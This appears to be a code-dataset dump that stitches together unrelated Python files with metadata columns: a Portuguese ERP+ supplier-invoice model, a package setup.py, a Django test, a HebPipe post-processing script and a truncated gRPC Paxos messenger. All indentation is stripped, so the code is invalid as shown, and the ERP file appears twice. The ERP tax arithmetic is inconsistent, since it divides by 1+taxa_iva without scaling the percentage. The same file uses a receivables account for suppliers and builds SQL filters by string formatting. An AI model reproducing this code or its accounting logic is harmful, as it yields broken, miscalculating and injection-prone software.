#esta função é uma função intermédia para evidar multiplos hit's na base de dados, desta forma só fazemos o request uma unica vez para todas as funções
def get_results():
try:
from my_linha_factura_forn import LinhaFacturaFornecedor
except:
from linha_factura_forn import LinhaFacturaFornecedor
record_lines = LinhaFacturaFornecedor(where="factura_forn = '{factura}'".format(factura=key)).get()
return record_lines
return erp_cache.get(key=self.__model_name__ + str(key), createfunc=get_results)
def getRecord(self, key):
def get_record():
record = FacturaFornecedor(where="id = '{id}'".format(id=key)).get()
return record
return erp_cache.get(key=self.__model_name__ + str(key), createfunc=get_record)
def get_valor_retido(self, key):
try:
from my_rh_retencao import RHRetencao
except:
from rh_retencao import RHRetencao
value = to_decimal(0)
if self.kargs['retencao']:
taxa = self.kargs['taxa_retencao']
if to_decimal(taxa) == to_decimal(0):
ret = RHRetencao().get()
if ret:
taxa = ret[0]['taxa_prestacao_servico']
total = self.get_total(key=key)
value = to_decimal(total*taxa/100)
self.kargs['taxa_retencao']=taxa
self.put()
else:
self.kargs['taxa_retencao']=to_decimal(0)
self.put()
return round(value,0)
def get_total(self, key):
value = to_decimal(0)
record_lines = self.record_lines(key)
if record_lines:
for line in record_lines:
value += to_decimal(line['valor_total'])
return round(value,0)
def get_total_desconto(self, key):
value = to_decimal(0)
record_lines = self.record_lines(key)
if record_lines:
for line in record_lines:
value += float(line['valor_total']) * float(line['desconto']) / 100
return round(value,0)
def get_total_iva(self, key):
value = to_decimal(0)
if not self.kargs['retencao']:
record_lines = self.record_lines(key=key)
if record_lines:
for line in record_lines:
value += to_decimal(line['valor_total']) - (to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100)))
return round(value,0)
def get_total_incidencia(self, key):
value = to_decimal(0)
if not self.kargs['retencao']:
record_lines = self.record_lines(key=key)
if record_lines:
for line in record_lines:
if to_decimal(line['iva']) > to_decimal(0):
value += to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100))
return round(value,0)
def get_total_incidencia_por_taxa(self, record_lines):
value = to_decimal(0)
if record_lines:
for line in record_lines:
if to_decimal(line['iva']) > to_decimal(0):
value += to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100))
return round(value,0)
def get_total_dedutivel(self, key):
value = to_decimal(0)
if not self.kargs['retencao']:
record_lines = self.record_lines(key=key)
if record_lines:
for line in record_lines:
if to_decimal(line['iva']) > to_decimal(0):
value += (to_decimal(line['valor_total']) - (to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100))))*(line['direito_deducao']/100)
return round(value,0)
def get_total_dedutivel_por_taxa(self, record_lines):
value = to_decimal(0)
if record_lines:
for line in record_lines:
if to_decimal(line['iva']) > to_decimal(0):
value += (to_decimal(line['valor_total']) - (to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100))))*(line['direito_deducao']/100)
return round(value,0)
def Imprimir(self, key, window_id):
template = 'factura_forn'
record = get_records_to_print(records=[self.kargs], model=self, child='linha_factura_forn')
return Report(record=record, report_template=template).show()
# falta converter de cliente para fornecedor
def Confirmar(self, key, window_id):
"""Gera movimento contabilistico (conta de receitas contra conta de terceiros)"""
self.kargs = get_model_record(model=self, key=key)
self.kargs['estado'] = 'Confirmado'
if not self.kargs['numero']:
self.kargs['numero'] = base_models.Sequence().get_sequence('factura_forn')
try:
from my_diario import Diario
except:
from diario import Diario
diario = Diario().get_diario(diario='compras')
try:
from my_periodo import Periodo
except:
from periodo import Periodo
periodo = Periodo().get_periodo(data=self.kargs['data'])
#Valida se o cliente é sujeito a iva
try:
from my_terceiro import Terceiro
except:
from terceiro import Terceiro
terceiro = Terceiro().get(key=self.kargs['fornecedor'])[0]
sujeito_iva = terceiro['sujeito_iva']
conta_terceiro = terceiro['a_receber']
try:
from my_movimento import Movimento
except:
from movimento import Movimento
movimento = Movimento(data=self.kargs['data'], numero=base_models.Sequence().get_sequence('movimento'), num_doc=self.kargs['numero'], descricao='Vossa Factura', diario=diario, documento='factura_forn', periodo=periodo, estado='Confirmado', user=self.kargs['user']).put()
#self.kargs['movimento'] = movimento
try:
from my_linha_factura_forn import LinhaFacturaFornecedor
except:
from linha_factura_forn import LinhaFacturaFornecedor
record_lines = LinhaFacturaFornecedor(where="factura_forn = '{factura}'".format(factura=self.kargs['id'])).get()
if record_lines:
try:
from my_linha_movimento import LinhaMovimento
except:
from linha_movimento import LinhaMovimento
try:
from my_produto import Produto
except:
from produto import Produto
try:
from my_familia_produto import FamiliaProduto
except:
from familia_produto import FamiliaProduto
for line in record_lines:
# aqui depois considerar a contabilização do desconto
quantidade = float(line['quantidade'])
product = Produto().get(key=line['produto'])[0]
contas = Produto().get_accounts(line['produto'])
#print (contas)
conta_gastos = contas['conta_gastos']
if sujeito_iva:
taxa_iva = product['iva']
else:
taxa_iva = to_decimal(0)
descricao = product['nome']
total_sem_iva = line['valor_total']/(1+taxa_iva)
LinhaMovimento(movimento=movimento, descricao=descricao, conta=conta_terceiro, quant_debito=quantidade, debito=total_sem_iva, quant_credito=to_decimal(0), credito=to_decimal(0), user=self.kargs['user']).put()
LinhaMovimento(movimento=movimento, descricao=descricao, conta=conta_gastos, quant_debito=to_decimal(0), debito=to_decimal(0), quant_credito=quantidade, credito=total_sem_iva, user=self.kargs['user']).put()
self.put()
ctx_dict = get_context(window_id)
ctx_dict['main_key'] = self.kargs['id']
set_context(window_id, ctx_dict)
return form_edit(window_id = window_id).show()
else:
return error_message('Não pode confirmar facturas sem linhas de factura! \n')
def Cancelar(self, key, window_id):
"""
Estorna movimento contabilistico
extorna caso confirmada ou simplesmente cancela se em rascunho
"""
self.kargs = get_model_record(model=self, key=key)
self.kargs['estado'] = 'Cancelado'
#print (self.kargs)
try:
from my_diario import Diario
except:
from diario import Diario
diario = Diario().get_diario(diario='compras')
try:
from my_periodo import Periodo
except:
from periodo import Periodo
periodo = Periodo().get_periodo(data=str(datetime.date.today()))
#Valida se o cliente é sujeito a iva
try:
from my_terceiro import Terceiro
except:
from terceiro import Terceiro
terceiro = Terceiro().get(key=self.kargs['fornecedor'])[0]
sujeito_iva = terceiro['sujeito_iva']
conta_terceiro = terceiro['a_receber']
#Tanto no movimento como no stock eu poderei ter vários movimentos, por exemplo o movimento em si e a anulação, além disso teremos que ter reconciliação de movimentos.
try:
from my_movimento import Movimento
except:
from movimento import Movimento
movimento = Movimento(data=datetime.date.today(), numero=base_models.Sequence().get_sequence('movimento'), num_doc=self.kargs['numero'], descricao='Anulação de Vossa Factura', documento='factura_forn', diario=diario, periodo=periodo, estado='Confirmado', user=self.kargs['user']).put()
#record['movimento'] = movimento
try:
from my_linha_factura_forn import LinhaFacturaFornecedor
except:
from linha_factura_forn import LinhaFacturaFornecedor
record_lines = LinhaFacturaFornecedor(where="factura_forn = '{factura}'".format(factura=self.kargs['id'])).get()
if record_lines:
try:
from my_linha_movimento import LinhaMovimento
except:
from linha_movimento import LinhaMovimento
try:
from my_produto import Produto
except:
from produto import Produto
try:
from my_familia_produto import FamiliaProduto
except:
from familia_produto import FamiliaProduto
for line in record_lines:
# aqui depois considerar a contabilização do desconto
quantidade = to_decimal(line['quantidade'])
product = Produto().get(key=line['produto'])[0]
contas = Produto().get_accounts(line['produto'])
conta_gastos = contas['conta_gastos']
if sujeito_iva:
taxa_iva = product['iva']
else:
taxa_iva = to_decimal(0)
descricao = product['nome']
total_sem_iva = line['valor_total']/(1+taxa_iva)
LinhaMovimento(movimento=movimento, descricao=descricao, conta=conta_gastos, quant_debito=quantidade, debito=total_sem_iva, quant_credito=to_decimal(0), credito=to_decimal(0), user=self.kargs['user']).put()
LinhaMovimento(movimento=movimento, descricao=descricao, conta=conta_terceiro, quant_debito=to_decimal(0), debito=to_decimal(0), quant_credito=quantidade, credito=total_sem_iva, user=self.kargs['user']).put()
self.put()
ctx_dict = get_context(window_id)
ctx_dict['main_key'] = self.kargs['id']
set_context(window_id, ctx_dict)
return form_edit(window_id = window_id).show()
def Rascunho(self, key, window_id):
self.kargs = get_model_record(model=self, key=key)
self.kargs['estado'] = 'Rascunho'
self.put()
return form_edit(window_id = window_id).show()
| # !/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
ERP+
"""
__author__ = '<NAME>'
__credits__ = []
__version__ = "1.0"
__maintainer__ = "<NAME>"
__status__ = "Development"
__model_name__='factura_forn.FacturaFornecedor'
import auth, base_models
from orm import *
from form import *
try:
from my_terceiro import Terceiro
except:
from terceiro import Terceiro
class FacturaFornecedor(Model, View):
def __init__(self, **kargs):
Model.__init__(self, **kargs)
self.__name__ = 'factura_forn'
self.__title__= 'Facturas de Fornecedor'
self.__model_name__ = __model_name__
self.__list_edit_mode__ = 'edit'
self.__order_by__ = 'int8(factura_forn.numero) DESC'
self.__workflow__ = (
'estado', {'Rascunho':['Confirmar'], 'Confirmado':['Imprimir', 'Pagar', 'Cancelar'], 'impresso':['Cancelar'], 'cancelado':[]}
)
self.__workflow_auth__ = {
'Confirmar':['All'],
'Imprimir':['All'],
'Pagar':['Caixa'],
'Cancelar':['Gestor'],
'full_access':['Gestor']
}
self.__tabs__ = [
('Faturação', ['data','numero','serie','fornecedor','retencao','taxa_retencao','estado','residual','notas','vendedor','linha_factura_forn','total','total_desconto', 'total_iva','total_dedutivel','valor_retido']),
('Movimentos', ['movs_contab', 'movs_stock']),
('Pagamentos',['pagamentos']),
]
self.__no_edit__ = [
('estado', ['Confirmado','Pago','Impresso','Cancelado'])
]
self.__auth__ = {
'read':['All'],
'write':['All'],
'create':['All'],
'delete':['Gestor'],
'full_access':['Gestor']
}
self.__get_options__ = ['numero']
self.data = date_field(view_order=1, name ='Data', args='required ', default=datetime.date.today())
self.numero = info_field(view_order=2, name ='Número',size=30)
self.serie = string_field(view_order=3, name='Serie', size=30, args='required')
self.notas = string_field(view_order=4, name ='Notas', args='autocomplete="on"', size=200, onlist=False)
self.fornecedor = choice_field(view_order=5, name ='Fornecedor', args='required', size=100, model='terceiro', column='nome', options='model.get_fornecedores()')
self.residual = currency_field(view_order=6, name ='Valor Residual', args='readonly', size=45, sum=True)
self.estado = info_field(view_order=7, name ='Estado', size=45, default='Rascunho', options=[('rascunho','Rascunho'), ('confirmado','Confirmado'), ('cancelado','Cancelado')])
self.pagamentos = list_field(view_order=8, name ='Pagamentos', condition="documento='factura_forn' and num_doc={numero}", model_name='linha_caixa.LinhaCaixa', list_edit_mode='edit', onlist = False)
self.movs_contab = list_field(view_order=9, name ='Movimentos Contab.', condition="documento='factura_forn' and num_doc={numero}", model_name='movimento.Movimento', list_edit_mode='edit', onlist = False)
self.movs_stock = list_field(view_order=10, name ='Movimentos Stock', condition="documento='factura_forn' and num_doc={numero}", model_name='stock.Stock', list_edit_mode='edit', onlist = False)
self.linha_factura_forn = list_field(view_order=11, name ='Linhas de Factura do Fornecedor', condition="factura_forn='{id}'", model_name='linha_factura_forn.LinhaFacturaFornecedor', list_edit_mode='inline', onlist= False, search= True)
self.total = function_field(view_order=12, name ='Total', size=70, sum=True)
self.total_iva = function_field(view_order=13, name ='Total IVA', size=70)
self.total_dedutivel = function_field(view_order=14, name ='Total IVA Dedutivel', size=70)
#self.retencao=boolean_field(view_order=15,name='Efectuar Retenção?', default=False,size=90)
self.retencao = combo_field(view_order=15,name='Retenção?', default="NAO", options=[('NAO','NAO'),('SIM','SIM')], size=50)
self.taxa_retencao = percent_field(view_order=16, name ='Taxa Retenção', size=45, onlist=False)
self.valor_retido=function_field(view_order=17, name='Total Retenção', onlist=False, args='readonly',size=70)
def get_fornecedores(self):
#print('estou em get_fornecedores do factura fornecedor')
return Terceiro().get_fornecedores()
def record_lines(self, key):
#esta função é uma função intermédia para evidar multiplos hit's na base de dados, desta forma só fazemos o request uma unica vez para todas as funções
def get_results():
try:
from my_linha_factura_forn import LinhaFacturaFornecedor
except:
from linha_factura_forn import LinhaFacturaFornecedor
record_lines = LinhaFacturaFornecedor(where="factura_forn = '{factura}'".format(factura=key)).get()
return record_lines
return erp_cache.get(key=self.__model_name__ + str(key), createfunc=get_results)
def getRecord(self, key):
def get_record():
record = FacturaFornecedor(where="id = '{id}'".format(id=key)).get()
return record
return erp_cache.get(key=self.__model_name__ + str(key), createfunc=get_record)
def get_valor_retido(self, key):
try:
from my_rh_retencao import RHRetencao
except:
from rh_retencao import RHRetencao
value = to_decimal(0)
if self.kargs['retencao']:
taxa = self.kargs['taxa_retencao']
if to_decimal(taxa) == to_decimal(0):
ret = RHRetencao().get()
if ret:
taxa = ret[0]['taxa_prestacao_servico']
total = self.get_total(key=key)
value = to_decimal(total*taxa/100)
self.kargs['taxa_retencao']=taxa
self.put()
else:
self.kargs['taxa_retencao']=to_decimal(0)
self.put()
return round(value,0)
def get_total(self, key):
value = to_decimal(0)
record_lines = self.record_lines(key)
if record_lines:
for line in record_lines:
value += to_decimal(line['valor_total'])
return round(value,0)
def get_total_desconto(self, key):
value = to_decimal(0)
record_lines = self.record_lines(key)
if record_lines:
for line in record_lines:
value += float(line['valor_total']) * float(line['desconto']) / 100
return round(value,0)
def get_total_iva(self, key):
value = to_decimal(0)
if not self.kargs['retencao']:
record_lines = self.record_lines(key=key)
if record_lines:
for line in record_lines:
value += to_decimal(line['valor_total']) - (to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100)))
return round(value,0)
def get_total_incidencia(self, key):
value = to_decimal(0)
if not self.kargs['retencao']:
record_lines = self.record_lines(key=key)
if record_lines:
for line in record_lines:
if to_decimal(line['iva']) > to_decimal(0):
value += to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100))
return round(value,0)
def get_total_incidencia_por_taxa(self, record_lines):
value = to_decimal(0)
if record_lines:
for line in record_lines:
if to_decimal(line['iva']) > to_decimal(0):
value += to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100))
return round(value,0)
def get_total_dedutivel(self, key):
value = to_decimal(0)
if not self.kargs['retencao']:
record_lines = self.record_lines(key=key)
if record_lines:
for line in record_lines:
if to_decimal(line['iva']) > to_decimal(0):
value += (to_decimal(line['valor_total']) - (to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100))))*(line['direito_deducao']/100)
return round(value,0)
def get_total_dedutivel_por_taxa(self, record_lines):
value = to_decimal(0)
if record_lines:
for line in record_lines:
if to_decimal(line['iva']) > to_decimal(0):
value += (to_decimal(line['valor_total']) - (to_decimal(line['valor_total']) / (1 + (to_decimal(line['iva']) / 100))))*(line['direito_deducao']/100)
return round(value,0)
def Imprimir(self, key, window_id):
template = 'factura_forn'
record = get_records_to_print(records=[self.kargs], model=self, child='linha_factura_forn')
return Report(record=record, report_template=template).show()
# falta converter de cliente para fornecedor
def Confirmar(self, key, window_id):
"""Gera movimento contabilistico (conta de receitas contra conta de terceiros)"""
self.kargs = get_model_record(model=self, key=key)
self.kargs['estado'] = 'Confirmado'
if not self.kargs['numero']:
self.kargs['numero'] = base_models.Sequence().get_sequence('factura_forn')
try:
from my_diario import Diario
except:
from diario import Diario
diario = Diario().get_diario(diario='compras')
try:
from my_periodo import Periodo
except:
from periodo import Periodo
periodo = Periodo().get_periodo(data=self.kargs['data'])
#Valida se o cliente é sujeito a iva
try:
from my_terceiro import Terceiro
except:
from terceiro import Terceiro
terceiro = Terceiro().get(key=self.kargs['fornecedor'])[0]
sujeito_iva = terceiro['sujeito_iva']
conta_terceiro = terceiro['a_receber']
try:
from my_movimento import Movimento
except:
from movimento import Movimento
movimento = Movimento(data=self.kargs['data'], numero=base_models.Sequence().get_sequence('movimento'), num_doc=self.kargs['numero'], descricao='Vossa Factura', diario=diario, documento='factura_forn', periodo=periodo, estado='Confirmado', user=self.kargs['user']).put()
#self.kargs['movimento'] = movimento
try:
from my_linha_factura_forn import LinhaFacturaFornecedor
except:
from linha_factura_forn import LinhaFacturaFornecedor
record_lines = LinhaFacturaFornecedor(where="factura_forn = '{factura}'".format(factura=self.kargs['id'])).get()
if record_lines:
try:
from my_linha_movimento import LinhaMovimento
except:
from linha_movimento import LinhaMovimento
try:
from my_produto import Produto
except:
from produto import Produto
try:
from my_familia_produto import FamiliaProduto
except:
from familia_produto import FamiliaProduto
for line in record_lines:
# aqui depois considerar a contabilização do desconto
quantidade = float(line['quantidade'])
product = Produto().get(key=line['produto'])[0]
contas = Produto().get_accounts(line['produto'])
#print (contas)
conta_gastos = contas['conta_gastos']
if sujeito_iva:
taxa_iva = product['iva']
else:
taxa_iva = to_decimal(0)
descricao = product['nome']
total_sem_iva = line['valor_total']/(1+taxa_iva)
LinhaMovimento(movimento=movimento, descricao=descricao, conta=conta_terceiro, quant_debito=quantidade, debito=total_sem_iva, quant_credito=to_decimal(0), credito=to_decimal(0), user=self.kargs['user']).put()
LinhaMovimento(movimento=movimento, descricao=descricao, conta=conta_gastos, quant_debito=to_decimal(0), debito=to_decimal(0), quant_credito=quantidade, credito=total_sem_iva, user=self.kargs['user']).put()
self.put()
ctx_dict = get_context(window_id)
ctx_dict['main_key'] = self.kargs['id']
set_context(window_id, ctx_dict)
return form_edit(window_id = window_id).show()
else:
return error_message('Não pode confirmar facturas sem linhas de factura! \n')
def Cancelar(self, key, window_id):
"""
Estorna movimento contabilistico
extorna caso confirmada ou simplesmente cancela se em rascunho
"""
self.kargs = get_model_record(model=self, key=key)
self.kargs['estado'] = 'Cancelado'
#print (self.kargs)
try:
from my_diario import Diario
except:
from diario import Diario
diario = Diario().get_diario(diario='compras')
try:
from my_periodo import Periodo
except:
from periodo import Periodo
periodo = Periodo().get_periodo(data=str(datetime.date.today()))
#Valida se o cliente é sujeito a iva
try:
from my_terceiro import Terceiro
except:
from terceiro import Terceiro
terceiro = Terceiro().get(key=self.kargs['fornecedor'])[0]
sujeito_iva = terceiro['sujeito_iva']
conta_terceiro = terceiro['a_receber']
#Tanto no movimento como no stock eu poderei ter vários movimentos, por exemplo o movimento em si e a anulação, além disso teremos que ter reconciliação de movimentos.
try:
from my_movimento import Movimento
except:
from movimento import Movimento
movimento = Movimento(data=datetime.date.today(), numero=base_models.Sequence().get_sequence('movimento'), num_doc=self.kargs['numero'], descricao='Anulação de Vossa Factura', documento='factura_forn', diario=diario, periodo=periodo, estado='Confirmado', user=self.kargs['user']).put()
#record['movimento'] = movimento
try:
from my_linha_factura_forn import LinhaFacturaFornecedor
except:
from linha_factura_forn import LinhaFacturaFornecedor
record_lines = LinhaFacturaFornecedor(where="factura_forn = '{factura}'".format(factura=self.kargs['id'])).get()
if record_lines:
try:
from my_linha_movimento import LinhaMovimento
except:
from linha_movimento import LinhaMovimento
try:
from my_produto import Produto
except:
from produto import Produto
try:
from my_familia_produto import FamiliaProduto
except:
from familia_produto import FamiliaProduto
for line in record_lines:
# aqui depois considerar a contabilização do desconto
quantidade = to_decimal(line['quantidade'])
product = Produto().get(key=line['produto'])[0]
contas = Produto().get_accounts(line['produto'])
conta_gastos = contas['conta_gastos']
if sujeito_iva:
taxa_iva = product['iva']
else:
taxa_iva = to_decimal(0)
descricao = product['nome']
total_sem_iva = line['valor_total']/(1+taxa_iva)
LinhaMovimento(movimento=movimento, descricao=descricao, conta=conta_gastos, quant_debito=quantidade, debito=total_sem_iva, quant_credito=to_decimal(0), credito=to_decimal(0), user=self.kargs['user']).put()
LinhaMovimento(movimento=movimento, descricao=descricao, conta=conta_terceiro, quant_debito=to_decimal(0), debito=to_decimal(0), quant_credito=quantidade, credito=total_sem_iva, user=self.kargs['user']).put()
self.put()
ctx_dict = get_context(window_id)
ctx_dict['main_key'] = self.kargs['id']
set_context(window_id, ctx_dict)
return form_edit(window_id = window_id).show()
def Rascunho(self, key, window_id):
self.kargs = get_model_record(model=self, key=key)
self.kargs['estado'] = 'Rascunho'
self.put()
return form_edit(window_id = window_id).show()
| pt | 0.971387 | # !/usr/bin/env python3 # -*- encoding: utf-8 -*- ERP+ #self.retencao=boolean_field(view_order=15,name='Efectuar Retenção?', default=False,size=90) #print('estou em get_fornecedores do factura fornecedor') #esta função é uma função intermédia para evidar multiplos hit's na base de dados, desta forma só fazemos o request uma unica vez para todas as funções # falta converter de cliente para fornecedor Gera movimento contabilistico (conta de receitas contra conta de terceiros) #Valida se o cliente é sujeito a iva #self.kargs['movimento'] = movimento # aqui depois considerar a contabilização do desconto #print (contas) Estorna movimento contabilistico extorna caso confirmada ou simplesmente cancela se em rascunho #print (self.kargs) #Valida se o cliente é sujeito a iva #Tanto no movimento como no stock eu poderei ter vários movimentos, por exemplo o movimento em si e a anulação, além disso teremos que ter reconciliação de movimentos. #record['movimento'] = movimento # aqui depois considerar a contabilização do desconto | 1.937342 | 2 |
setup.py | Caojunkai/douyu | 0 | 6616754 | <gh_stars>0
from setuptools import setup
from douyu import __VERSION__
version = __VERSION__
setup(
name='fitz-douyu',
packages=['douyu', 'douyu.chat', 'douyu.chat.network'],
version=version,
description='Python Wrapper for DouyuTV APIs, including support for accessing ChatRoom, e.g. DanMu',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/caojunkai/douyu',
download_url='https://github.com/douyu',
keywords=['douyu', 'douyutv', 'danmu', 'chat'],
classifiers=[],
)
| from setuptools import setup
from douyu import __VERSION__
version = __VERSION__
setup(
name='fitz-douyu',
packages=['douyu', 'douyu.chat', 'douyu.chat.network'],
version=version,
description='Python Wrapper for DouyuTV APIs, including support for accessing ChatRoom, e.g. DanMu',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/caojunkai/douyu',
download_url='https://github.com/douyu',
keywords=['douyu', 'douyutv', 'danmu', 'chat'],
classifiers=[],
) | none | 1 | 1.444101 | 1 | |
proso_subscription/commands_test.py | adaptive-learning/proso-apps | 2 | 6616755 | from django.core.management import call_command
from proso.django.test import TestCase
from .models import SubscriptionPlan, DiscountCode
class TestPlansLoading(TestCase):
def test_loading(self):
call_command('load_subscription_plans', 'testproject/test_data/subscription/plans.json')
first = SubscriptionPlan.objects.get(identifier='first')
second = SubscriptionPlan.objects.get(identifier='second')
self.assertTrue(first.active)
self.assertFalse(second.active)
self.assertEqual(first.descriptions.all().count(), 2)
self.assertEqual(second.descriptions.all().count(), 2)
self.assertTrue(first.featured)
code_global = DiscountCode.objects.get(identifier="global")
code_local = DiscountCode.objects.get(identifier="local-first")
self.assertIsNotNone(code_global.code)
self.assertEqual(code_global.discount_percentage, 100)
self.assertIsNone(code_global.plan)
self.assertIsNone(code_global.usage_limit)
self.assertEqual(code_local.code, DiscountCode.objects.prepare_code("slunicko"))
self.assertIsNotNone(code_local.plan)
self.assertEqual(code_local.usage_limit, 100)
self.assertEqual(code_local.discount_percentage, 30)
| from django.core.management import call_command
from proso.django.test import TestCase
from .models import SubscriptionPlan, DiscountCode
class TestPlansLoading(TestCase):
def test_loading(self):
call_command('load_subscription_plans', 'testproject/test_data/subscription/plans.json')
first = SubscriptionPlan.objects.get(identifier='first')
second = SubscriptionPlan.objects.get(identifier='second')
self.assertTrue(first.active)
self.assertFalse(second.active)
self.assertEqual(first.descriptions.all().count(), 2)
self.assertEqual(second.descriptions.all().count(), 2)
self.assertTrue(first.featured)
code_global = DiscountCode.objects.get(identifier="global")
code_local = DiscountCode.objects.get(identifier="local-first")
self.assertIsNotNone(code_global.code)
self.assertEqual(code_global.discount_percentage, 100)
self.assertIsNone(code_global.plan)
self.assertIsNone(code_global.usage_limit)
self.assertEqual(code_local.code, DiscountCode.objects.prepare_code("slunicko"))
self.assertIsNotNone(code_local.plan)
self.assertEqual(code_local.usage_limit, 100)
self.assertEqual(code_local.discount_percentage, 30)
| none | 1 | 2.23982 | 2 | |
data_preparation/postprocess_hebpipe.py | Iddoyadlin/hebrew-w2v | 7 | 6616756 | <reponame>Iddoyadlin/hebrew-w2v
#!/usr/bin/env python
from argparse import ArgumentError
from argparse import ArgumentParser
from pathlib import Path
from tqdm import tqdm
from base import get_absolute_path
def parse_args():
parser = ArgumentParser("Post process HebPipe output to a single file")
parser.add_argument("-f", "--folder", metavar="FOLDER", help="Input folder", required=True)
parser.add_argument("-o", "--output", help='Output file', required=True)
args = parser.parse_args()
return args
def get_paths(input_folder: str, output: str):
folder = get_absolute_path(input_folder)
assert folder.is_dir(), "folder must be a valid folder"
output = get_absolute_path(output)
assert not output.exists(), "output must not be an existing file"
return folder, output
def process_files(input_folder: Path, output: Path):
if not input_folder.exists():
input_folder.mkdir(parents=True)
elif list(input_folder.glob('**/*')):
print(f'there are already files in {input_folder}, skipping postprocessing tokenized corpus')
return
files = list(input_folder.glob('**/*'))
if not files:
print(f'no files were found in tokenized output folder {input_folder}.')
return
with output.open('wb+') as f2:
for fname in tqdm(files, desc='processing files', total=len(files), unit='file'):
with fname.open('rb') as f:
lines = [clean_line(line.decode()) for line in f.readlines()]
f2.write(' '.join(lines).strip().encode('utf-8'))
print(f"saved final corpus to {output}")
def main():
args = parse_args()
folder, output = get_paths(args.folder, args.output)
process_files(folder, output)
def clean_line(line):
line = line.strip().replace("|", " ")
if line in ("<s>", "</s>"):
return '\n'
else:
return line
if __name__ == '__main__':
try:
main()
except ArgumentError as e:
print(e)
exit(1)
| #!/usr/bin/env python
from argparse import ArgumentError
from argparse import ArgumentParser
from pathlib import Path
from tqdm import tqdm
from base import get_absolute_path
def parse_args():
parser = ArgumentParser("Post process HebPipe output to a single file")
parser.add_argument("-f", "--folder", metavar="FOLDER", help="Input folder", required=True)
parser.add_argument("-o", "--output", help='Output file', required=True)
args = parser.parse_args()
return args
def get_paths(input_folder: str, output: str):
folder = get_absolute_path(input_folder)
assert folder.is_dir(), "folder must be a valid folder"
output = get_absolute_path(output)
assert not output.exists(), "output must not be an existing file"
return folder, output
def process_files(input_folder: Path, output: Path):
if not input_folder.exists():
input_folder.mkdir(parents=True)
elif list(input_folder.glob('**/*')):
print(f'there are already files in {input_folder}, skipping postprocessing tokenized corpus')
return
files = list(input_folder.glob('**/*'))
if not files:
print(f'no files were found in tokenized output folder {input_folder}.')
return
with output.open('wb+') as f2:
for fname in tqdm(files, desc='processing files', total=len(files), unit='file'):
with fname.open('rb') as f:
lines = [clean_line(line.decode()) for line in f.readlines()]
f2.write(' '.join(lines).strip().encode('utf-8'))
print(f"saved final corpus to {output}")
def main():
args = parse_args()
folder, output = get_paths(args.folder, args.output)
process_files(folder, output)
def clean_line(line):
line = line.strip().replace("|", " ")
if line in ("<s>", "</s>"):
return '\n'
else:
return line
if __name__ == '__main__':
try:
main()
except ArgumentError as e:
print(e)
exit(1) | ru | 0.26433 | #!/usr/bin/env python | 3.11294 | 3 |
paxos/messengers/rpcMessenger.py | victordomene/ram-paxos | 0 | 6616757 | """
This module provides an implementation of the Messenger class using Google's
RPC Protocol (gRPC).
For the specific documentation of the arguments these methods take and
what they do at a high level, refer to messenger.py.
"""
from grpc.beta import implementations
from messenger import Messenger
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from protobufs import paxos_pb2
TIMEOUT_SECONDS = 10
def ignore(future):
result = future.result()
return
def ignore_accept(future):
result = future.result()
return
def ignore_promise(future):
result = future.result()
return
def ignore_learn(future):
result = future.result()
return
def ignore_refuse(future):
result = future.result()
return
class grpcMessenger(Messenger):
def __init__(self, name):
Messenger.__init__(self)
self.name = name
self.destinations = {}
return
def _fetch_stub(self, name):
# fetch the stub for the proposer
try:
stub = self.destinations[name]
except KeyError:
print "_fetch_stub: could not find stub for {}".format(name)
return None
except:
print "_fetch_stub: unknown error"
return None
return stub
def get_quorum(self):
return self.destinations.keys()
def add_destination(self, name, host, port):
# uses gRPC to create a channel and a stub
channel = implementations.insecure_channel(host, port)
stub = paxos_pb2.beta_create_VM_stub(channel)
# simply change the entry; do not check if it already exists
self.destinations[name] = stub
# function always succeeds
return True
def send_prepare(self, p, n, quorum):
for acceptor in quorum:
# fetch the stub for each of the acceptors
stub = self._fetch_stub(acceptor)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.PrepareRequest(proposal_number = p,
decree_number = n, proposer = self.name)
# finally send message to this acceptor
response = stub.handle_prepare.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore)
return True
def send_accept(self, p, n, v, quorum):
for acceptor in quorum:
# fetch the stub for each of the acceptors
stub = self._fetch_stub(acceptor)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.AcceptRequest(proposal_number = p,
decree_number = n, value = v, proposer = self.name)
# finally send message to this acceptor
response = stub.handle_accept.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore_accept)
return True
def send_promise(self, had_previous, p, proposer, n, v, dest):
# fetch the stub for the proposer
stub = self._fetch_stub(dest)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.PromiseRequest(had_previous = had_previous, proposal_number = p,
proposer = proposer, decree_number = n, value = v, acceptor = self.name)
# finally send promise back to proposer
response = stub.handle_promise.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore_promise)
return True
def send_refuse(self, p, proposer, n, dest):
# fetch the stub for the proposer
stub = self._fetch_stub(dest)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.RefuseRequest(proposal_number = p,
proposer = proposer, decree_number = n, acceptor = self.name)
# finally send refusal back to proposer
response = stub.handle_refuse.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore_refuse)
return True
def send_learn(self, p, proposer, n, v, learner):
# fetch the stub for the learner
stub = self._fetch_stub(learner)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.LearnRequest(proposal_number = p, proposer = proposer,
decree_number = n, value = v, acceptor = self.name)
# finally send message to learner
response = stub.handle_learn.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore_learn)
return True
| """
This module provides an implementation of the Messenger class using Google's
RPC Protocol (gRPC).
For the specific documentation of the arguments these methods take and
what they do at a high level, refer to messenger.py.
"""
from grpc.beta import implementations
from messenger import Messenger
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
